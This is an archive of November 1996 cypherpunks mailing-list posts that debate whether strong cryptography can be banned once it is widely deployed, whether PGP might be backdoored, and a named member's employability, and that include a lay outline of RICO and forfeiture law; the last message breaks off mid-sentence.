From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel T. Hagan" <dhagan@vt.edu>
Date: Thu, 7 Nov 1996 12:50:55 -0800 (PST)
To: Peter Hendrickson <ph@netcom.com>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b07aea7f1963f8c@[192.0.2.1]>
Message-ID: <Pine.OSF.3.95.961107154908.14910A-100000@rottweiler.cslab.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Peter Hendrickson wrote:

> It appears to be widely believed that cryptoanarchy is irreversible.
> Everybody believes that the race to deploy or forbid strong cryptography
> will define the outcome for a long time.
> 
> I can't think of a reason why this should be so.
> 
> If the wide use of strong cryptography results in widely unpopular
> activities such as sarin attacks and political assassinations, it
> would not be all that hard to forbid it, even after deployment.
> 
> I am curious why many people believe this is not true.
> 
> Peter Hendrickson
> ph@netcom.com

If I understand the reasoning, people beleive it is easier to prevent the
release of strong crypto. techiniques than to remove them once they are
released.  

Once a terrorist has strong crypto, why should they stop using it if it
becomes illegal?

Daniel

---
Daniel Hagan                 http://acm.vt.edu/~dhagan                CS Major 
dhagan@vt.edu 	       http://acm.vt.edu/~dhagan/PGPkey.html     Virginia Tech
     Key fingerprint =  DB 18 30 0A E1 69 7E 51  E2 14 E3 E3 1C AE 69 97





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim McCoy <mccoy@communities.com>
Date: Thu, 7 Nov 1996 15:57:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0baea80ee121af@[192.0.2.1]>
Message-ID: <v03007806aea825ccbb92@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


ph@netcom.com (Peter Hendrickson) writes:
[...]
>> Once a terrorist has strong crypto, why should they stop using it if it
>> becomes illegal?
>
>Use of strong crypto would be a tip off that one is a terrorist.
>
>If strong cryptography were unpopular and highly illegal, very few
>people would be using it.  This makes it easy to identify suspects.

But the difference between strong crypto and weak crypto is not
something which is visible to an outside observer unless they make
the effort to attack a particular system or decrypt a message.  Such
an attack is beyond the capacity of most municipal or state governements
and is a difficult and expensive task for federal agencies other than
the NSA (who would nto be pleased if their machines were suddenly at
the beck and call of the FBI or any other organization; never underestimate
the power of inter-agency infighting :) What make such detection even
harder is that a good crypto system generates output which is
indistinguishable from noise, this makes it much easier to hide the fact
that an encrypted channel is being used.  The funny thing about noise in
the information theory sense is that it can actually be _anything_ depending
on context, and this sort of uncertainty is the bane of a legal system
which is solidly grounded upon technicalities (such as the US legal system.)

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 15:56:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis now on the "Don't Hire" list
In-Reply-To: <2.2.32.19961107221247.0069347c@smtp1.abraxis.com>
Message-ID: <v03007803aea827844e20@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:12 PM -0500 11/7/96, Alec wrote:

>:This opens up the potential, for example, for Tim May to sue the operator of
>:the Cypherpunks mailing list now for posts from users (even anonymous ones)
>:which defame or otherwise liable his character, reputation, or ability to
>:pursue income in his chosen field.
>
>PLEASE, let's not drag poor Tim into this. Hasn't he suffered enough?!
>This does not follow even from the tortured logic above.

And, indeed, it is not likely to be who suffers in the job market as a
result of Dr. Vulis' rants and raves and generally insane postings; my
situation is secure, but I understand that Vulis has joined L. Dettweiler
on the "List of Unemployables" passed around Silicon Valley.

I strongly doubt many computer companies in the Silicon Valley will be
willing to hire him or his consulting service as his antics have received
publicity.

He may have his "NetScum" list and Web page, but it's his name on the list
of folks not to hire.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kb4vwa@juno.com (Edward R. Figueroa)
Date: Thu, 7 Nov 1996 16:02:11 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Validating a program
In-Reply-To: <199611071941.OAA13267@homeport.org>
Message-ID: <19961107.160817.5359.12.kb4vwa@juno.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Nov 1996 14:41:06 -0500 (EST) Adam Shostack <adam@homeport.org>
writes:
>
>Dale Thorn wrote:
>| stewarts@ix.netcom.com wrote:
>| > >> On Tue, 5 Nov 1996, Edward R. Figueroa wrote:
>| > >> > Last,  I would like to know once and for all,  is PGP 
>compromised,  is
>| > >> > there a back door, and have we been fooled by NSA to believe
>| > >> > it's secure? 
>| > You can read and compile the source code yourself.
>
>| Really?  All 60,000 or so lines, including all 'includes' or 
>attachments?
>| 
>| I'll bet you can't find 10 out of 1,000 users who have read the 
>total source,
>| let alone comprehended and validated it.
>
>	The fact that most readers have not examined it does not mean
>that the availability of the source is not important.  If the source
>was tightly held, perhaps some experts would have seen it.  Thats not
>likely, security experts are in high demand today, with companies
>paying a lot for their time.  Phil could not have competed.
>
>	In addition, up and coming experts, curious amatuers, and
>students couldn't have looked at it.  Having your protocol open to
>wide review is a good thing even if few people take advantage of it,
>because you may hire the wrong experts.  The experts you hire may miss
>something.  Someone may have a new attack under development, and not
>be able to try it against your software.
>
>	The multitude of hackers who ported pgp also contributed a
>large stack of bug reports and fixes.  Without source availablity, the
>mac, os/2, amiga & UNIX ports would be held up, or perhaps not exist.
>
>	Publicly distributed source code also tends to be of higher
>quality (see Fuzz Revisited, at grilled.cs.wisc.edu)
>
>
>	In short, if you're paranoid, feel free to look over the
>source.  But the fact that most people have never peeked under the
>hood is not a strike against pgp at all.
>
>
>
>-- 
>"It is seldom that liberty of any kind is lost all at once."
>					               -Hume
>
>
>
>
Maybe you missed my point, or I miss-communicated.  My question is as
follows:  If PGP and DES are as secure as thought to be, then why is it
not ruled illegal software, just as they do with silencers, narcotics,
certain type weapons, etc.....    My opinion is "NOT  A PARANOID VIEW, BUT RATHER A REALITY".   I find it impossible that software that could be a National Security Threat, being shared by the masses!    I believe
either people are nieve, or ignorant of the capability of the NSA.    If
there are "back-doors to the algorithms, you can bet your life you and no
one else will find out.     The conceivability that encryption on the Net
is safe, is ludicrous!

Just my thoughts, and not paranoia.


Ed




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 16:05:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0eaea81512961e@[192.0.2.1]>
Message-ID: <v03007805aea82999cb21@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:38 PM -0800 11/7/96, Peter Hendrickson wrote:

>If you can get a life prison term for your strong crypto you may
>hesitate to use it.  If not, then you may get to be an example
>for everybody else.

Well, this is what in private e-mail to Peter I was referring to when I
said "only a police state" could pull the plug on free speech and strong
crypto once it was ubiquitously deployed.

Throwing people in prison for life for using crypto is something that is
certainly _possible_, though I rather doubt taxpayers will be keen on
paying for this. Simply executing those who use random numbers makes more
sense.

All implausible, of course.

--Tim May

By the way, I've never claimed that I know crypto anarchy is irreversible,
I just think it is. I've presented some plausibility arguments on why I
think this is so, drawing parallels to other developments in history, but
logical proofs and predictions about the future don't usually go together
very well.


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 16:11:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis now on the "Don't Hire" list
Message-ID: <v03007807aea82ba245ac@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I just wrote:

And, indeed, it is not likely to be who suffers in the job market as a
result of
                                   ^me
Dr. Vulis' rants and raves and generally insane postings; my situation is
secure, but I understand that Vulis has joined L. Dettweiler on the "List
of Unemployables" passed around Silicon Valley.

...

I meant to say "it is not likely to be _me_ who suffers in the job market..."


Sorry for any confusion.

--Tim

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 7 Nov 1996 16:39:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0baea80ee121af@[192.0.2.1]>
Message-ID: <v03007808aea82cc3897c@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:24 PM -0800 11/7/96, Peter Hendrickson wrote:
>> If I understand the reasoning, people beleive it is easier to prevent the
>> release of strong crypto. techiniques than to remove them once they are
>> released.
>
>The reasons underlying this are what I don't completely understand.
>
>> Once a terrorist has strong crypto, why should they stop using it if it
>> becomes illegal?
>
>Use of strong crypto would be a tip off that one is a terrorist.
>
>If strong cryptography were unpopular and highly illegal, very few
>people would be using it.  This makes it easy to identify suspects.

* Identification of high-entropy traffic (putatively: encrypted traffic)
would require extensive surveillance, tapping, and whatnot. The
infrastructure for this does not exist, and would cost an enormous amount
to deploy.

* (This is why so many of us want a crackdown on crypto delayed for as long
as possible: every year that passes means more networks, more intranets,
more channels, more modes, etc. Satellites, fibers, etc.)

* High-entropy traffic does not mean encryption, either. And encrypted
traffic can be twiddled to look like lower-entropy traffic (and I don't
even mean steganography, I mean adjusting message statistics).

* Once crypto has become widespread, and is built into mailers, browsers,
etc., there will be many people already using those old mailers and
browsers. Throwing Mom and Pop in jail because they forgot to turn off the
PGP mode in Eudora 4.0 or Netscape 5.0 is not going to go over well, even
in an era of supposed "zero-tolerance." (And California and Arizona just
voted to effectively decriminalize pot..."medical use of encryption" on the
2005 ballot?)

* Steganography. Entire volumes can be written about this. I believe I was
the first to propose, in a 1988-89 series of articles on sci.crypt, the use
of LSBs in image and sound files to transmit huge amounts of information,
with detection very difficult. As I told Kevin Kelley--reported in his
"Whole Earth Review" article and in his excellent "Out of Control" book--a
single DAT tape of a musical recording can easily carry 150-200 MB of
"message" just in the LSBs! Unless all tapes are checked at the border--and
what are live tapes, with lots of noise in the bottom few bits of each
word--to be compared against? The mind boggles at the task.

* "Legitimate needs." The whole notion Peter raises of banning cryptography
is fraught with problems. Are businesses to be told that all communications
are to be in the clear? Or is Peter's point that some form of GAK will be
used?

(If the latter, then of course we are back to an even better form of
"stego" than stego itself: superencrypt before using GAK. Unless the
government samples packets randomly and does what they say they will do to
open a GAKked packet--e.g., get a court order, go to the escrow key
holders, etc.--then how will they know if a message is superencrypted? And
what if a GAKked message contains conventional _codes_? Are shorthand codes
such as business have long used--"The rain in Rome is warm this month"--to
be illegal?)

* The point being that "rogue crypto" (terrorists, crypto anarchists,
freedom fighters) gets lost on the blizzard of other uses. And shutting
down all crypto means shutting down business use of crypto to protect
secrets, and probably means an end to digital commerce.

(This is another reason we want to delay action on crypto for as long as
possible: make encrypted communications so widespread in commerce that to
pull the plug would mean a financial calamity.)

* Intent. It's hard to imagine someone being imprisoned for using
cryptography, except perhaps in wartime conditions. I may be wrong. Also,
there are deep Constitutional issues we haven't been much discussing.

* Offshore sites. Even if U.S. citizen-units are proscribed from using
crypto--a hard thing to do--many crypto-anarchic markets will flourish
overseas. (If communication with offshore persons or sites is allowed, all
sorts of things can be done. If such communication is banned, this means a
profound change in the American system.) [I have not fleshed out the
arguments here, adequately, so don't focus on this point to rebut the rest
of my arguments, please.]

In another post, Peter posits a condition where people are appalled at the
implications of crypto and there is no popular support for it. But is he
implyiung that neighbors will burst into the homes of others to ferret out
crypto. I doubt this vigilantism will ever happen.

(My gun example is apropos. I believe we are fast approaching a point where
most people want guns outlawed. But it won't happen, as there are not
enough cops and military people willing to raid private homes in
contravention of the Bill of Rights and at personal risk to
themselves....and so it won't happen.

Once crypto is deeply intertwined into the fabric of life and commerce,
it'll be too late to pull the plug.

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 7 Nov 1996 13:45:10 -0800 (PST)
To: attila@primenet.com
Subject: RICO - (Was: Group order for Secret Power)
In-Reply-To: <199611072121.OAA08171@infowest.com>
Message-ID: <Pine.SUN.3.94.961107163919.17279B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I've had a pair of requests for my RICO outline.  Though much of it is
geared to discuss remailers and the "prostitution car case" I'm reposting
it.

If people are REALLY intrested in a more specific outline, I'll consider
pecking out another one.

begin:

Several people expressed interest in a small treatment of seizure law 
jurisprudence, and the Bennis case (seizure of an automobile used for 
soliciting prostitution was upheld even where one of the owners knew 
nothing about its use for a crime and which Mr. Bell has relied on 
fairly heavily in pointing out that the Supreme Court has its "head 
up its ass.")

I want to point out that I'm not being paid for this.  As a result 
anyone who takes this like legal advice, rather than what it is, i.e. 
an academic examination, does so at their own peril.

-A-

RICO

I cover RICO because it's a popular prosecution tool, because it is 
the predominate vehicle for seizure and forfeiture in federal cases 
(of which remailer and encryption issues are likely to arouse) and 
because it represents a codification of the approach most courts take 
when dealing with seizure cases.  In a very real way, RICO represents 
the outer extremes of seizure cases in the United States, and is 
probably, given the complexity of many state laws, the simplest way 
to "grab" something.  It also has civil provisions which make 
"private prosecutors" out of you and me.

Generally speaking, after its passage (1970) RICO was ignored.  
(Interested readers might look to Bradley, Racketeers, Congress and 
the Courts: An Analysis of RICO, 65 Iowa Law Review, 837 (1980). for 
a detailed review of its early development).  It was "rediscovered" 
some years later, and grew in popularity because of the civil 
provisions for divestiture, dissolution, reorganization, and 
restrictions on future activites as well as treble damages under 18 
U.S.C. 1964.

Generally speaking, in order to secure a conviction with RICO, one 
must prove the existance of an "enterprise" and a connected "pattern 
of racketeering activity."  RICO prosecutions are generally triggered 
by predicate acts, listed specifically in the statute.  The statute 
lists these in the definitions section.  (Section 1961)  I reproduce 
some below to give the reader a feel for what is anticipated:

As used in this chapter--
(1) "racketeering activity" means (A) any act or threat involving 
murder, kidnaping, gambling, arson, robbery, bribery, extortion, 
dealing in obscene matter, or dealing in a controlled substance or 
listed chemical (as defined in section 102 of the Controlled 
Substance Act), which is chargeable under State law and punishable by 
imprisonment for more than one year; (B) any act which is indictable 
under any of the following provisions of title 18, United States 
Code: [bribery, sports bribery, counterfeiting, theft from interstate 
shipment, embezzlement from pension or welfare funds, extortionate 
credit transactions, mail fraud, transmission of gambling 
information, wire fraud, financial institution fraud, obscene 
matters, obstruction of justice, tampering with witnesses, informants 
or victims, money laundering, monetary transactions with respect to 
property derived from unlawful activity, sexual exploitation of 
children, white slavery, (some deleted)]  (18 U.S.C. 1961)

The activities specifically prohibited by RICO are also statuatorily 
defined.  Specifically:

(a) It shall be unlawful for any person who has received any income 
derived, directly or indirectly, from a pattern of racketeering 
activity... in which such person has participated as a principal 
within the meaning of section 2, title 18, United States Code, to use 
or invest, directly or indirectly, any part of such income, or the 
proceeds of such income, in acquisition of any interest in, or the 
estlablishment or operation of, any enterprise which is engaged in, 
or the activities of which affect, interstate or foreign commerce....
(b) It shall be unlawful for any person through a pattern of 
racketeering activity or through collection of an unlawful debt to 
acquire or maintain, directly or indirectly, any interest in or 
control of any enterprise which is engaged in, or the activities of 
which affect, interstate or foreign commerce.
(c) It shall be unlawful for any person employed by or associated 
with any enterprise engaged in, or the activities of which affect, 
interstate or foreign commerce, to conduct or participate, directly 
or indirectly, in the conduct of such enterprise's affairs through a 
pattern of racketeering activity or collection of an unlawful debt.  
(Section 1962)
(d) [or to conspire to do any of the above]

The seizure provisions are contained in 18 U.S.C., Section 1963:

(a) Whoever violates any provision of section 1962 of this chapter 
shall be [fined and imprisoned or both] and shall forfeit to the 
United States, irrespective of any provision of State Law--
(1) any interest the person has acquired or maintained in violation 
of section 1962;
(2) any --
(A) interest in;
(B) security of;
(C) claim against; or
(D) property or contractual right of any kind affording a source of 
influence over;
[the enterprise violating section 1962]; and
(3) any property constituting, or derived from, any proceeds which 
the person obtained, directly or indirectly, from racketeering 
activity or unlawful debt collection in violation of section 1962.
[...]
(b) Property subject to criminal forfeiture under this sections 
includes--
(1) real property, including things growing to, affixed to, and found 
in land; and
(2) tangible and intangible personal property, including rights, 
privileges, interests, claims and securities.

The lead case generally used to outline the overall principals of 
RICO is United States v. Turkette, 452 U.S. 576 (1981).

Most of the defining litigation surrounding RICO involved refining 
the definitions of "enterprise" and "pattern" of racketeering.  
Turkette indicates in part that:

Section 1962(c) makes it unlawful "for any person employed by or 
associated with any enterprise engaged in, or the activities of which 
affect, interstate or foreign commerce, to conduct or participate, 
directly or indirectly, in the conduct of such enterprise's affairs 
through a pattern of racketeering activity or collection of unlawful 
debt."  The term "enterprise" is defined as including "any 
individual, partnership, corporation, association, or other legal 
entity, and any union or group of individuals associated in fact 
although not a legal entity."  (Turkette)

Of primary importance, and the key issue in Turkette, is the fact 
that "There is no restriction upon the associations embraced by the 
definition: an enterprise includes any union or group of individuals 
associated in fact." Id.

Both legitimate and illegitimate enterprises qualify.  United States 
v. Hartley, 678 F.2d 961 (11th Cir. 1982) applied RICO to an 
otherwise legitimate corporate defendant.  On the subject of passive 
involvement of a defendant in criminal activity the court in Haroco 
Inc. v. American Nat'l Bank & Trust Co. 747 F.2d 284 (7th Cir. 1984) 
offers:

...the defendants are surely correct in saying that the corporation 
enterprise should not be liable when the corporation is itself the 
victim or target or merely the passive instrument for the wrongdoing 
of others... The liable person may be a corporation using the 
proceeds of a pattern of racketeering activity in its operations.  
This approach... makes the corporation enterprise liable under RICO 
when the corporation is actually the direct or indirect beneficiary 
of the pattern of racketeering activity, but not when it is merely 
the victim, prize, or passive instrument of racketeering.  This 
result is in accord with the primary purpose of RICO, which, after 
all, is to reach those who ultimately profit from racketeering, not 
those who are victimized by it. (This preference for enterprise 
liability has been followed by other courts. See e.g., Schreiber 
Distributing Co. v. Serv-Well Furniture Co., 806 F.2d 1393 (9th Cir. 
1986); Commonwealth of Pa. v. Derry Construction Co., 617 F.Supp 940 
(W.D.PA 1985).  See generally, First, Business Crime, 1990)

And Ravens v. Ernst and Young, 113 S.Ct. 1163, refines the definition 
of "conduct or participate" thusly:

Once we understand the word "conduct" to require some degree of 
direction, and the word "participate" to require some part in that 
direction, the meaning of section 1962(c) comes into focus.  In order 
to "participate, directly or indirectly in the conduct of such 
enterprise's affairs," one must have some part in directing those 
affairs.  Of course, the word "participate" makes clear that RICO 
liability is not limited to those with primary responsibility for the 
enterprise's affairs, just as the phrase "directly or indirectly" 
makes clear that RICO liability is not limited to those with a formal 
position in the enterprise, [note 4] but some part in directing the 
enterprise's affairs is required.  The "operation or management" test 
expresses this requirement in a formulation that is easy to apply... 
In sum, we hold that "to conduct or participate, directly or 
indirectly, in the conduct of such enterprise's affairs," one must 
participate in the operation or management of the enterprise itself.

Let us assume for a moment then that the worst conspiracy one can 
imagine, involving all of the horsemen of the infopocalypse, uses a 
remailer to conduct its activities.  Absent a showing that the 
conspiracy is involved, participating, or directing the operation of 
the remailer, or that the conspiracy used proceeds to support the 
remailer, it is pretty clear that the remailer, and the operator are 
a "passive instrument" of the conspiracy.

One might also look to the Justice Department Guidelines for the use 
of RICO as a prosecutoral tool:

"...it is not the policy of the criminal Division to approve 
"imaginative" prosecutions under RICO which are far afield from the 
Congressional purpose of the RICO statute.... Further, it should be 
noted that only in exceptional circumstances will approval be granted 
when RICO is sought merely to serve some evidentiary purpose, rather 
than to attack the activity which Congress most directly addressed- 
the infiltration of organized crime into the nation's economy."  (9-
110.200, RICO guidelines preface).

One might also look at the second circuit in Huber:

"We further note that where the forfeiture [under RICO] threatens 
disproportionately to reach untainted property of the defendant... 
section 1963 permits the [court] a certain amount of discretion in 
avoiding draconian (and perhaps unconstitutional) applications of the 
forfeiture provision."

In sum, provided no statute exists expressly felonizing the operation 
of e-mail forwarding or encryption, I wouldn't much worry about RICO.  
I might add that future legislation prohibiting "furtherance of a 
felony via encryption" or some such is almost certain to have a 
scienter requirement making innocent forwarders of such information 
who did not know they were furthering a felony immune from the 
statute, and thus RICO.

-B-

The Michigan Case, and why it has absolutely nothing to do with 
remailers.

Mr. Bell has made a great to-do about the Bennis case (seizure of 
automobile absent showing that co-owner knew of criminal use of 
same).  His connection of the case to remailers and is surrounded by 
a good deal of imagination, myth, and outright fabrication.  I 
thought I would take a closer look and see what was to be found.  Let 
me then dispel some of the myths.


Myth #1:  This holding means that any property can be seized for any 
crime and the owner placed at the mercy of the state at a whim.

Totally false.  The Michigan law is specifically written to allow 
property seizure in the specific instance of prostitution or 
gambling.  Many states have forfeiture laws, but they are an extreme 
resort, and typically bear only on very narrow activities.  Michigan, 
further, is at the draconian side of the spectrum.  Michigan also has 
some of the toughest state drug laws in the country (Automatic life 
sentence without parole for mere possession without intent to 
distribute, of more than 650 grams of cocaine)  Consider the Michigan 
law, reproduced below.

Section 600.3801 of Michigan's Compiled Laws. states in pertinent 
part: "Any building, vehicle, boat, aircraft, or place used for the 
purpose of lewdness, assignation or prostitution or gambling, or used 
by, or kept for the use of prostitutes or other disorderly persons... 
is declared a nuisance, ... and all... nuisances shall be enjoined 
and abated as provided in this act and as provided in the court 
rules.  Any person or his or her servant, agent, or employee who 
owns, leases, conducts, or maintains any building, vehicle, or place 
used for any of the purposes or acts set forth in this section is 
guilty of a nuisance."
Section 600.3825 states in pertinent part:
   "(1) Order of abatement. If the existence of the nuisance is 
established in an action as provided in this chapter, an order of 
abatement shall be entered as a part of the judgment in the case, 
which order shall direct the removal from the building or place of 
all furniture, fixtures and contents therein and shall direct the 
sale thereof in the manner provided for the sale of chattels under 
execution . . . .
"(2) Vehicles, sale. Any vehicle, boat, or aircraft found by the 
court to be a nuisance within the meaning of this chapter, is subject 
to the same order and judgment as any furniture, fixtures and 
contents as herein provided."  Mich. Comp. Laws Ann. @ 600.3825 
(1987).


Myth #2: This means that if your property is seized, you can never 
make an innocent owner defense to the seizure.

Again, false.  Many statutes allow innocent owner defenses and some 
courts will assume the availability of such a defense in absence of 
express intent by the legislature to the contrary.  In this case 
there was such an expression.  Namely:

"Proof of knowledge of the existence of the nuisance on the part of 
the defendants or any of them, is not required." Mich. Comp. Laws 
Ann. @ 600.3815(2) (1987).


Myth #3: If your car is stolen, and it is used in the sales of drugs, 
its gone baby.

False.  Most states recognize that use of property without the 
owner's consent insulates the property from seizure.  Michigan is no 
exception.  Note the Supreme Court's Comment in the Bennis Case:

The Michigan Supreme Court specifically noted that, in its view, an 
owner's interest may not be abated when "a vehicle is used without 
the owner's consent." Id., at 742, n. 36, 527 N.W.2d at 495, n. 36.


Myth #4:  This is a new and outlandish holding by the Supreme Court.  
Nothing like this has ever been seen before.  It represents a turn to 
fascism.  The current Supreme Court has its head up its ass.

False.  The history of allowing seizure of property not taken without 
the owners consent, even if the specific use of the property was 
indeed without the owners knowledge goes back more than 150 years and 
can be traced to Britain's own practice (maintained to this day).  
Take the Supreme Court's comment again in the Bennis Case:

Our earliest opinion to this effect is Justice Story's opinion for 
the Court in The Palmyra, 25 U.S. 1, 12 Wheat. 1, 6 L. Ed. 531 
(1827). The Palmyra, which had been commissioned as a privateer by 
the King of Spain and had attacked a United States vessel, was 
captured  [*10]   by a United States war ship and brought into 
Charleston, South Carolina, for adjudication. Id., at 8. On the 
Government's appeal from the Circuit Court's acquittal of the vessel, 
it was contended by the owner that the vessel could not be forfeited 
until he was convicted for the privateering. The Court rejected this 
contention, explaining:
"The thing is here primarily considered as the offender, or rather 
the offense is attached primarily to the thing." Id., at 14.


Myth #5:  This means that if someone drives my car to the city, and 
then blows up a building and flees via subway, my car is history.

False.  In order to allow seizure, the property seized must typically 
be an "instrumentality" of the crime.  Granted this is a bit of a 
obscure distinction at times, even to supreme court justices:

The limits on what property can be forfeited as a result of what 
wrongdoing--for example, what it means to "use" property in crime for 
purposes of forfeiture law--are not clear to me. See United States v. 
James Daniel Good Real Property, 510 U.S., ___ (1993) (slip op., at 
2-5) (THOMAS, J., concurring in part and dissenting in part). 
(Bennis)

But it's fairly clear that this is a significant defense to seizure, 
and one which was never raised by the defense in Bennis:

It thus seems appropriate, where a [challenge] by an innocent owner 
is concerned, to apply those limits rather strictly, adhering to 
historical standards for determining whether specific property is an 
"instrumentality" of crime. Cf. J. W. Goldsmith, Jr.-Grant Co., 
supra, at 512 (describing more extreme hypothetical applications of a 
forfeiture law and reserving decision on the permissibility of such 
applications).The facts here, however, do not seem to me to be 
obviously distinguishable from those involved in Van Oster; and in 
any event, Mrs. Bennis has not asserted that the car was not an 
instrumentality of her husband's crime. (Bennis)

After getting the government's brief by fax this afternoon, it became 
fairly clear why the non-instrumentality defense was not made.

After John Bennis was seen stopping and allowing Ms. Polarchio to 
enter his car, the Police followed him to a residential area, midway 
in the block, where his car stopped and the lights were turned off. 
(TR-63-65) After the police stopped behind the Bennis' auto, two 
heads were seen: a female on the right, a male on the left. Seconds 
later, the female head went down, disappearing toward the drivers 
side. (TR 65-66)
When the officer observed John Bennis and Kathy Polarchio engaged in 
fellatio in the Bennis' car, John Bennis had his pants pulled down. 
(TR-67)  (Bennis: Brief for the Government)

It's pretty hard to argue that the automobile was not an 
instrumentality of the crime when it was used to pick up, transport 
and conceal the illicit sexual practices of the defendant.


Myth #6: The court just doesn't care about property rights.

False.  The court spends a great deal of time thinking about the 
parties rights, and even suggests a different ruling had the car not 
be co-owned by the perpetrator of the crime.

First, it bears emphasis that the car in question belonged to John 
Bennis as much as it did to Tina Bennis. At all times he had her 
consent to use the car, just as she had his. (Bennis)

It also considered what Mrs. Bennis would actually gain from a ruling 
in her favor from a practical standpoint:

Th[e] court declined to order a division of sale proceeds, as the 
trial judge took pains to explain, for two practical reasons: the 
Bennises have "another automobile," App. 25; and the age and value of 
the forfeited car (an 11-year-old Pontiac purchased by John and Tina 
Bennis for $ 600) left "practically nothing" to divide after 
subtraction of costs. See ante, at 3 (majority opinion) (citing App. 
25).(Bennis)

While it is tempting to damn the decision after listening to the 
sound bytes, there is much more going on here than a mere seizure.

Remailer operators shouldn't be concerned (at least with regard to 
these cases) overmuch until a local state statute addressing 
remailers specifically is passed in a jurisdiction where the innocent 
owner defense is not permitted, or in any jurisdiction where such 
statute forbids resort to the innocent owner defense.  I will, 
however, note that this about 3 hours work, and I wouldn't go betting 
the farm on it.


--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Thu, 7 Nov 1996 16:51:31 -0800 (PST)
To: Jim McCoy <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b00aea82fb2502a@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:00 PM 11/7/1996, Jim McCoy wrote:
>ph@netcom.com (Peter Hendrickson) writes:
>[...]
>>> Once a terrorist has strong crypto, why should they stop using it if it
>>> becomes illegal?

>> Use of strong crypto would be a tip off that one is a terrorist.

>> If strong cryptography were unpopular and highly illegal, very few
>> people would be using it.  This makes it easy to identify suspects.

> But the difference between strong crypto and weak crypto is not
> something which is visible to an outside observer unless they make
> the effort to attack a particular system or decrypt a message.  Such
> an attack is beyond the capacity of most municipal or state governements
> and is a difficult and expensive task for federal agencies other than
> the NSA (who would nto be pleased if their machines were suddenly at
> the beck and call of the FBI or any other organization; never underestimate
> the power of inter-agency infighting :)

If mandatory GAK were imposed, reviewing messages is easy, even with
inter-agency fighting.  Or, encryption in general could just be
forbidden if GAK created too much hassle.

> What make such detection even harder is that a good crypto system
> generates output which is indistinguishable from noise, this makes it
> much easier to hide the fact that an encrypted channel is being used.

In practice I suspect that good stego is hard.  You don't have to be
right every time when you look for it, just some of the time.  When
you see packets that seem kind of funny to you, the judge issues you
